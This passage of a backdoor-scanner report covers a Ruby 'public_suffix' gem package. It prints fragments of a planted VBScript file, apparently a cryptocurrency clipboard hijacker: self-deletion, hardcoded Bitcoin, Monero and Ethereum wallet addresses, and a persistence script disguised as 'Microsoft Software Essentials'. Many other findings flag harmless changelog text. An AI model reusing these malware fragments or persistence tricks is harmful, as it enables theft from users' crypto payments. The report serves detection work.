                      "text": "\ntrd = Transit routing domain, or known as a subdomain. This is the part of the domain that is before the sld or root domain. For example, in `https://www.mozilla.org/en-US/`, `www` is the trd.\n\nFQDN = Fully Qualified Domain Names, are domain names that are written with the hostname and the domain name, and include the top-level domain, the format looks like `[hostname].[domain].[tld].` for ex. `[www].[mozilla].[org]`.\n",
                      "markdown": "`\ntrd = Transit routing domain, or known as a subdomain. This is the part of the domain that is before the sld or root domain. For example, in `https://www.mozilla.org/en-US/`, `www` is the trd.\n\nFQDN = Fully Qualified Domain Names, are domain names that are written with the hostname and the domain name, and include the top-level domain, the format looks like `[hostname].[domain].[tld].` for ex. `[www].[mozilla].[org]`.\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000704"
          },
          "message": {
            "text": "Backdoor: Data Exfiltration (Hostname)",
            "id": "BD000704"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/README.md"
                },
                "region": {
                  "startLine": 222,
                  "startColumn": 80,
                  "endLine": 222,
                  "endColumn": 88,
                  "snippet": {
                    "text": "\ntrd = Transit routing domain, or known as a subdomain. This is the part of the domain that is before the sld or root domain. For example, in `https://www.mozilla.org/en-US/`, `www` is the trd.\n\nFQDN = Fully Qualified Domain Names, are domain names that are written with the hostname and the domain name, and include the top-level domain, the format looks like `[hostname].[domain].[tld].` for ex. `[www].[mozilla].[org]`.\n",
                    "rendered": {
                      "text": "\ntrd = Transit routing domain, or known as a subdomain. This is the part of the domain that is before the sld or root domain. For example, in `https://www.mozilla.org/en-US/`, `www` is the trd.\n\nFQDN = Fully Qualified Domain Names, are domain names that are written with the hostname and the domain name, and include the top-level domain, the format looks like `[hostname].[domain].[tld].` for ex. `[www].[mozilla].[org]`.\n",
                      "markdown": "`\ntrd = Transit routing domain, or known as a subdomain. This is the part of the domain that is before the sld or root domain. For example, in `https://www.mozilla.org/en-US/`, `www` is the trd.\n\nFQDN = Fully Qualified Domain Names, are domain names that are written with the hostname and the domain name, and include the top-level domain, the format looks like `[hostname].[domain].[tld].` for ex. `[www].[mozilla].[org]`.\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000804"
          },
          "message": {
            "text": "Backdoor: Long Strings",
            "id": "BD000804"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/lib/the_Score.vbs"
                },
                "region": {
                  "startLine": 9,
                  "startColumn": 8,
                  "endLine": 9,
                  "endColumn": 52,
                  "snippet": {
                    "text": "Dim Fygna, Nfbvm, Sctcr, Zvofm, Fobuo, Rlfad\nFygna = \"bc1qgmem0e4mjejg4lpp03tzlmhfpj580wv5hhkf3p\"\nNfbvm = \"467FN8ns2MRYfLVEuyiMUKisvjz7zYaS9PkJVXVCMSwq37NeesHJpkfG44mxEFHu8Nd9VDtcVy4kM9iVD7so87CAH2iteLg\"\nSctcr = \"0xcB56f3793cA713813f6f4909D7ad2a6EEe41eF5e\"\nZvofm = objWSH.ExpandEnvironmentStrings(\"%PROGRAMDATA%\") & \"\\Microsoft Essentials\"\nFobuo = Zvofm & \"\\Software Essentials.vbs\"\nRlfad = \"Microsoft Software Essentials\"\n",
                    "rendered": {
                      "text": "Dim Fygna, Nfbvm, Sctcr, Zvofm, Fobuo, Rlfad\nFygna = \"bc1qgmem0e4mjejg4lpp03tzlmhfpj580wv5hhkf3p\"\nNfbvm = \"467FN8ns2MRYfLVEuyiMUKisvjz7zYaS9PkJVXVCMSwq37NeesHJpkfG44mxEFHu8Nd9VDtcVy4kM9iVD7so87CAH2iteLg\"\nSctcr = \"0xcB56f3793cA713813f6f4909D7ad2a6EEe41eF5e\"\nZvofm = objWSH.ExpandEnvironmentStrings(\"%PROGRAMDATA%\") & \"\\Microsoft Essentials\"\nFobuo = Zvofm & \"\\Software Essentials.vbs\"\nRlfad = \"Microsoft Software Essentials\"\n",
                      "markdown": "`Dim Fygna, Nfbvm, Sctcr, Zvofm, Fobuo, Rlfad\nFygna = \"bc1qgmem0e4mjejg4lpp03tzlmhfpj580wv5hhkf3p\"\nNfbvm = \"467FN8ns2MRYfLVEuyiMUKisvjz7zYaS9PkJVXVCMSwq37NeesHJpkfG44mxEFHu8Nd9VDtcVy4kM9iVD7so87CAH2iteLg\"\nSctcr = \"0xcB56f3793cA713813f6f4909D7ad2a6EEe41eF5e\"\nZvofm = objWSH.ExpandEnvironmentStrings(\"%PROGRAMDATA%\") & \"\\Microsoft Essentials\"\nFobuo = Zvofm & \"\\Software Essentials.vbs\"\nRlfad = \"Microsoft Software Essentials\"\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 2
          }
        },
        {
          "rule": {
            "id": "BD000804"
          },
          "message": {
            "text": "Backdoor: Long Strings",
            "id": "BD000804"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/lib/the_Score.vbs"
                },
                "region": {
                  "startLine": 8,
                  "startColumn": 8,
                  "endLine": 8,
                  "endColumn": 105,
                  "snippet": {
                    "text": "On Error Resume Next\nDim Fygna, Nfbvm, Sctcr, Zvofm, Fobuo, Rlfad\nFygna = \"bc1qgmem0e4mjejg4lpp03tzlmhfpj580wv5hhkf3p\"\nNfbvm = \"467FN8ns2MRYfLVEuyiMUKisvjz7zYaS9PkJVXVCMSwq37NeesHJpkfG44mxEFHu8Nd9VDtcVy4kM9iVD7so87CAH2iteLg\"\nSctcr = \"0xcB56f3793cA713813f6f4909D7ad2a6EEe41eF5e\"\nZvofm = objWSH.ExpandEnvironmentStrings(\"%PROGRAMDATA%\") & \"\\Microsoft Essentials\"\nFobuo = Zvofm & \"\\Software Essentials.vbs\"\n",
                    "rendered": {
                      "text": "On Error Resume Next\nDim Fygna, Nfbvm, Sctcr, Zvofm, Fobuo, Rlfad\nFygna = \"bc1qgmem0e4mjejg4lpp03tzlmhfpj580wv5hhkf3p\"\nNfbvm = \"467FN8ns2MRYfLVEuyiMUKisvjz7zYaS9PkJVXVCMSwq37NeesHJpkfG44mxEFHu8Nd9VDtcVy4kM9iVD7so87CAH2iteLg\"\nSctcr = \"0xcB56f3793cA713813f6f4909D7ad2a6EEe41eF5e\"\nZvofm = objWSH.ExpandEnvironmentStrings(\"%PROGRAMDATA%\") & \"\\Microsoft Essentials\"\nFobuo = Zvofm & \"\\Software Essentials.vbs\"\n",
                      "markdown": "`On Error Resume Next\nDim Fygna, Nfbvm, Sctcr, Zvofm, Fobuo, Rlfad\nFygna = \"bc1qgmem0e4mjejg4lpp03tzlmhfpj580wv5hhkf3p\"\nNfbvm = \"467FN8ns2MRYfLVEuyiMUKisvjz7zYaS9PkJVXVCMSwq37NeesHJpkfG44mxEFHu8Nd9VDtcVy4kM9iVD7so87CAH2iteLg\"\nSctcr = \"0xcB56f3793cA713813f6f4909D7ad2a6EEe41eF5e\"\nZvofm = objWSH.ExpandEnvironmentStrings(\"%PROGRAMDATA%\") & \"\\Microsoft Essentials\"\nFobuo = Zvofm & \"\\Software Essentials.vbs\"\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 2
          }
        },
        {
          "rule": {
            "id": "BD000804"
          },
          "message": {
            "text": "Backdoor: Long Strings",
            "id": "BD000804"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/lib/the_Score.vbs"
                },
                "region": {
                  "startLine": 7,
                  "startColumn": 8,
                  "endLine": 7,
                  "endColumn": 52,
                  "snippet": {
                    "text": "objFSO.DeleteFile(wscript.ScriptFullName)\nOn Error Resume Next\nDim Fygna, Nfbvm, Sctcr, Zvofm, Fobuo, Rlfad\nFygna = \"bc1qgmem0e4mjejg4lpp03tzlmhfpj580wv5hhkf3p\"\nNfbvm = \"467FN8ns2MRYfLVEuyiMUKisvjz7zYaS9PkJVXVCMSwq37NeesHJpkfG44mxEFHu8Nd9VDtcVy4kM9iVD7so87CAH2iteLg\"\nSctcr = \"0xcB56f3793cA713813f6f4909D7ad2a6EEe41eF5e\"\nZvofm = objWSH.ExpandEnvironmentStrings(\"%PROGRAMDATA%\") & \"\\Microsoft Essentials\"\n",
                    "rendered": {
                      "text": "objFSO.DeleteFile(wscript.ScriptFullName)\nOn Error Resume Next\nDim Fygna, Nfbvm, Sctcr, Zvofm, Fobuo, Rlfad\nFygna = \"bc1qgmem0e4mjejg4lpp03tzlmhfpj580wv5hhkf3p\"\nNfbvm = \"467FN8ns2MRYfLVEuyiMUKisvjz7zYaS9PkJVXVCMSwq37NeesHJpkfG44mxEFHu8Nd9VDtcVy4kM9iVD7so87CAH2iteLg\"\nSctcr = \"0xcB56f3793cA713813f6f4909D7ad2a6EEe41eF5e\"\nZvofm = objWSH.ExpandEnvironmentStrings(\"%PROGRAMDATA%\") & \"\\Microsoft Essentials\"\n",
                      "markdown": "`objFSO.DeleteFile(wscript.ScriptFullName)\nOn Error Resume Next\nDim Fygna, Nfbvm, Sctcr, Zvofm, Fobuo, Rlfad\nFygna = \"bc1qgmem0e4mjejg4lpp03tzlmhfpj580wv5hhkf3p\"\nNfbvm = \"467FN8ns2MRYfLVEuyiMUKisvjz7zYaS9PkJVXVCMSwq37NeesHJpkfG44mxEFHu8Nd9VDtcVy4kM9iVD7so87CAH2iteLg\"\nSctcr = \"0xcB56f3793cA713813f6f4909D7ad2a6EEe41eF5e\"\nZvofm = objWSH.ExpandEnvironmentStrings(\"%PROGRAMDATA%\") & \"\\Microsoft Essentials\"\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 2
          }
        },
        {
          "rule": {
            "id": "BD000600"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Windows Indicator",
            "id": "BD000600"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 447,
                  "startColumn": 10,
                  "endLine": 447,
                  "endColumn": 18,
                  "snippet": {
                    "text": "\n## Release 0.5.1\n\n- CHANGED: Update public suffix list to 14dc66dd53c1 2010-09-15 17:09 +0100\n\n\n## Release 0.5.0\n",
                    "rendered": {
                      "text": "\n## Release 0.5.1\n\n- CHANGED: Update public suffix list to 14dc66dd53c1 2010-09-15 17:09 +0100\n\n\n## Release 0.5.0\n",
                      "markdown": "`\n## Release 0.5.1\n\n- CHANGED: Update public suffix list to 14dc66dd53c1 2010-09-15 17:09 +0100\n\n\n## Release 0.5.0\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000600"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Windows Indicator",
            "id": "BD000600"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 442,
                  "startColumn": 10,
                  "endLine": 442,
                  "endColumn": 18,
                  "snippet": {
                    "text": "\n## Release 0.5.2\n\n- CHANGED: Update public suffix list to 248ea690d671 2010-09-16 18:02 +0100\n\n\n## Release 0.5.1\n",
                    "rendered": {
                      "text": "\n## Release 0.5.2\n\n- CHANGED: Update public suffix list to 248ea690d671 2010-09-16 18:02 +0100\n\n\n## Release 0.5.1\n",
                      "markdown": "`\n## Release 0.5.2\n\n- CHANGED: Update public suffix list to 248ea690d671 2010-09-16 18:02 +0100\n\n\n## Release 0.5.1\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000600"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Windows Indicator",
            "id": "BD000600"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 415,
                  "startColumn": 10,
                  "endLine": 415,
                  "endColumn": 18,
                  "snippet": {
                    "text": "\n## Release 0.8.0\n\n- CHANGED: Update public suffix list to d1a5599b49fa 2010-10-25 15:10 +0100 (#9)\n\n- NEW: Add support for Fully Qualified Domain Names (#7)\n\n",
                    "rendered": {
                      "text": "\n## Release 0.8.0\n\n- CHANGED: Update public suffix list to d1a5599b49fa 2010-10-25 15:10 +0100 (#9)\n\n- NEW: Add support for Fully Qualified Domain Names (#7)\n\n",
                      "markdown": "`\n## Release 0.8.0\n\n- CHANGED: Update public suffix list to d1a5599b49fa 2010-10-25 15:10 +0100 (#9)\n\n- NEW: Add support for Fully Qualified Domain Names (#7)\n\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000600"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Windows Indicator",
            "id": "BD000600"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 219,
                  "startColumn": 69,
                  "endLine": 219,
                  "endColumn": 73,
                  "snippet": {
                    "text": "## Release 2.0.0\n\n- NEW: Added PublicSuffix.domain # => sld.tld\n- NEW: Added the ability to disable the use of private domains either at runtime, in addition to the ability to not load the private domains section when reading the list (`private_domains: false`). This feature also superseded the `private_domains` class-level attribute, that is no longer available.\n\n- CHANGED: Considerable performance improvements (GH-92)\n- CHANGED: Updated definitions.\n",
                    "rendered": {
                      "text": "## Release 2.0.0\n\n- NEW: Added PublicSuffix.domain # => sld.tld\n- NEW: Added the ability to disable the use of private domains either at runtime, in addition to the ability to not load the private domains section when reading the list (`private_domains: false`). This feature also superseded the `private_domains` class-level attribute, that is no longer available.\n\n- CHANGED: Considerable performance improvements (GH-92)\n- CHANGED: Updated definitions.\n",
                      "markdown": "`## Release 2.0.0\n\n- NEW: Added PublicSuffix.domain # => sld.tld\n- NEW: Added the ability to disable the use of private domains either at runtime, in addition to the ability to not load the private domains section when reading the list (`private_domains: false`). This feature also superseded the `private_domains` class-level attribute, that is no longer available.\n\n- CHANGED: Considerable performance improvements (GH-92)\n- CHANGED: Updated definitions.\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000600"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Windows Indicator",
            "id": "BD000600"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 177,
                  "startColumn": 45,
                  "endLine": 177,
                  "endColumn": 49,
                  "snippet": {
                    "text": "improve the lookup time while reducing storage space.\n\nFor this reason, several public methods that are no longer applicable have been deprecated\nand/or removed. You can find more information at GH-133.\n\n- CHANGED: Updated definitions.\n- CHANGED: Dropped support for Ruby < 2.1\n",
                    "rendered": {
                      "text": "improve the lookup time while reducing storage space.\n\nFor this reason, several public methods that are no longer applicable have been deprecated\nand/or removed. You can find more information at GH-133.\n\n- CHANGED: Updated definitions.\n- CHANGED: Dropped support for Ruby < 2.1\n",
                      "markdown": "`improve the lookup time while reducing storage space.\n\nFor this reason, several public methods that are no longer applicable have been deprecated\nand/or removed. You can find more information at GH-133.\n\n- CHANGED: Updated definitions.\n- CHANGED: Dropped support for Ruby < 2.1\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 392,
                  "startColumn": 68,
                  "endLine": 392,
                  "endColumn": 74,
                  "snippet": {
                    "text": "\n## Release 0.8.3\n\n- FIXED: Fixed ArgumentError: invalid byte sequence in US-ASCII with Ruby 1.9.2 (#12).\n\n- CHANGED: Updated definitions (#11).\n\n",
                    "rendered": {
                      "text": "\n## Release 0.8.3\n\n- FIXED: Fixed ArgumentError: invalid byte sequence in US-ASCII with Ruby 1.9.2 (#12).\n\n- CHANGED: Updated definitions (#11).\n\n",
                      "markdown": "`\n## Release 0.8.3\n\n- FIXED: Fixed ArgumentError: invalid byte sequence in US-ASCII with Ruby 1.9.2 (#12).\n\n- CHANGED: Updated definitions (#11).\n\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 387,
                  "startColumn": 44,
                  "endLine": 387,
                  "endColumn": 50,
                  "snippet": {
                    "text": "## Release 0.8.4\n\n- FIXED: Reverted bugfix for issue #12 for Ruby 1.8.6.\n  This is the latest version compatible with Ruby 1.8.6.\n\n\n## Release 0.8.3\n",
                    "rendered": {
                      "text": "## Release 0.8.4\n\n- FIXED: Reverted bugfix for issue #12 for Ruby 1.8.6.\n  This is the latest version compatible with Ruby 1.8.6.\n\n\n## Release 0.8.3\n",
                      "markdown": "`## Release 0.8.4\n\n- FIXED: Reverted bugfix for issue #12 for Ruby 1.8.6.\n  This is the latest version compatible with Ruby 1.8.6.\n\n\n## Release 0.8.3\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 386,
                  "startColumn": 42,
                  "endLine": 386,
                  "endColumn": 48,
                  "snippet": {
                    "text": "\n## Release 0.8.4\n\n- FIXED: Reverted bugfix for issue #12 for Ruby 1.8.6.\n  This is the latest version compatible with Ruby 1.8.6.\n\n\n",
                    "rendered": {
                      "text": "\n## Release 0.8.4\n\n- FIXED: Reverted bugfix for issue #12 for Ruby 1.8.6.\n  This is the latest version compatible with Ruby 1.8.6.\n\n\n",
                      "markdown": "`\n## Release 0.8.4\n\n- FIXED: Reverted bugfix for issue #12 for Ruby 1.8.6.\n  This is the latest version compatible with Ruby 1.8.6.\n\n\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 379,
                  "startColumn": 44,
                  "endLine": 379,
                  "endColumn": 50,
                  "snippet": {
                    "text": "\n## Release 0.9.0\n\n- CHANGED: Minimum Ruby version increased to Ruby 1.8.7.\n\n- CHANGED: rake/gempackagetask is deprecated.  Use rubygems/package_task instead.\n\n",
                    "rendered": {
                      "text": "\n## Release 0.9.0\n\n- CHANGED: Minimum Ruby version increased to Ruby 1.8.7.\n\n- CHANGED: rake/gempackagetask is deprecated.  Use rubygems/package_task instead.\n\n",
                      "markdown": "`\n## Release 0.9.0\n\n- CHANGED: Minimum Ruby version increased to Ruby 1.8.7.\n\n- CHANGED: rake/gempackagetask is deprecated.  Use rubygems/package_task instead.\n\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 379,
                  "startColumn": 18,
                  "endLine": 379,
                  "endColumn": 24,
                  "snippet": {
                    "text": "\n## Release 0.9.0\n\n- CHANGED: Minimum Ruby version increased to Ruby 1.8.7.\n\n- CHANGED: rake/gempackagetask is deprecated.  Use rubygems/package_task instead.\n\n",
                    "rendered": {
                      "text": "\n## Release 0.9.0\n\n- CHANGED: Minimum Ruby version increased to Ruby 1.8.7.\n\n- CHANGED: rake/gempackagetask is deprecated.  Use rubygems/package_task instead.\n\n",
                      "markdown": "`\n## Release 0.9.0\n\n- CHANGED: Minimum Ruby version increased to Ruby 1.8.7.\n\n- CHANGED: rake/gempackagetask is deprecated.  Use rubygems/package_task instead.\n\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 254,
                  "startColumn": 30,
                  "endLine": 254,
                  "endColumn": 36,
                  "snippet": {
                    "text": "\n## Release 1.5.0\n\n- CHANGED: Dropped support for Ruby < 2.0\n\n- CHANGED: Updated definitions.\n\n",
                    "rendered": {
                      "text": "\n## Release 1.5.0\n\n- CHANGED: Dropped support for Ruby < 2.0\n\n- CHANGED: Updated definitions.\n\n",
                      "markdown": "`\n## Release 1.5.0\n\n- CHANGED: Dropped support for Ruby < 2.0\n\n- CHANGED: Updated definitions.\n\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 185,
                  "startColumn": 87,
                  "endLine": 185,
                  "endColumn": 93,
                  "snippet": {
                    "text": "- CHANGED: Removed `PublicSuffix::List.clear`, it was an unnecessary accessor method. Use `PublicSuffix::List.default = nil` if you **really** need to reset the default list. You shouldn't.\n- CHANGED: `PublicSuffix::List#select` is now private. You should not use it, instead use `PublicSuffix::List#find`.\n- CHANGED: `PublicSuffix::List` no longer implements Enumerable. Instead, use `#each` to loop over, or get an Enumerator.\n- CHANGED: Redesigned internal list storage and lookup algorithm to achieve O(1) lookup time (see GH-133).\n\n\n## Release 2.0.5\n",
                    "rendered": {
                      "text": "- CHANGED: Removed `PublicSuffix::List.clear`, it was an unnecessary accessor method. Use `PublicSuffix::List.default = nil` if you **really** need to reset the default list. You shouldn't.\n- CHANGED: `PublicSuffix::List#select` is now private. You should not use it, instead use `PublicSuffix::List#find`.\n- CHANGED: `PublicSuffix::List` no longer implements Enumerable. Instead, use `#each` to loop over, or get an Enumerator.\n- CHANGED: Redesigned internal list storage and lookup algorithm to achieve O(1) lookup time (see GH-133).\n\n\n## Release 2.0.5\n",
                      "markdown": "`- CHANGED: Removed `PublicSuffix::List.clear`, it was an unnecessary accessor method. Use `PublicSuffix::List.default = nil` if you **really** need to reset the default list. You shouldn't.\n- CHANGED: `PublicSuffix::List#select` is now private. You should not use it, instead use `PublicSuffix::List#find`.\n- CHANGED: `PublicSuffix::List` no longer implements Enumerable. Instead, use `#each` to loop over, or get an Enumerator.\n- CHANGED: Redesigned internal list storage and lookup algorithm to achieve O(1) lookup time (see GH-133).\n\n\n## Release 2.0.5\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 180,
                  "startColumn": 30,
                  "endLine": 180,
                  "endColumn": 36,
                  "snippet": {
                    "text": "and/or removed. You can find more information at GH-133.\n\n- CHANGED: Updated definitions.\n- CHANGED: Dropped support for Ruby < 2.1\n- CHANGED: `PublicSuffix::List#rules` is now protected. You should not rely on it as the internal rule representation is subject to change to optimize performances.\n- CHANGED: Removed `PublicSuffix::List.clear`, it was an unnecessary accessor method. Use `PublicSuffix::List.default = nil` if you **really** need to reset the default list. You shouldn't.\n- CHANGED: `PublicSuffix::List#select` is now private. You should not use it, instead use `PublicSuffix::List#find`.\n",
                    "rendered": {
                      "text": "and/or removed. You can find more information at GH-133.\n\n- CHANGED: Updated definitions.\n- CHANGED: Dropped support for Ruby < 2.1\n- CHANGED: `PublicSuffix::List#rules` is now protected. You should not rely on it as the internal rule representation is subject to change to optimize performances.\n- CHANGED: Removed `PublicSuffix::List.clear`, it was an unnecessary accessor method. Use `PublicSuffix::List.default = nil` if you **really** need to reset the default list. You shouldn't.\n- CHANGED: `PublicSuffix::List#select` is now private. You should not use it, instead use `PublicSuffix::List#find`.\n",
